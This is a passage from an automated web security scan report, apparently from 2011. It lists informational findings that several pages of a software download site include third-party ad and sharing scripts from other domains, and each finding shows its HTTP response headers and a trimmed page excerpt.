<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.58. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.59. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.60. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.61. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.62. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.63. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.64. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.65. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.66. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.67. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.68. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.69. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.70. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.71. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.72. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.73. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
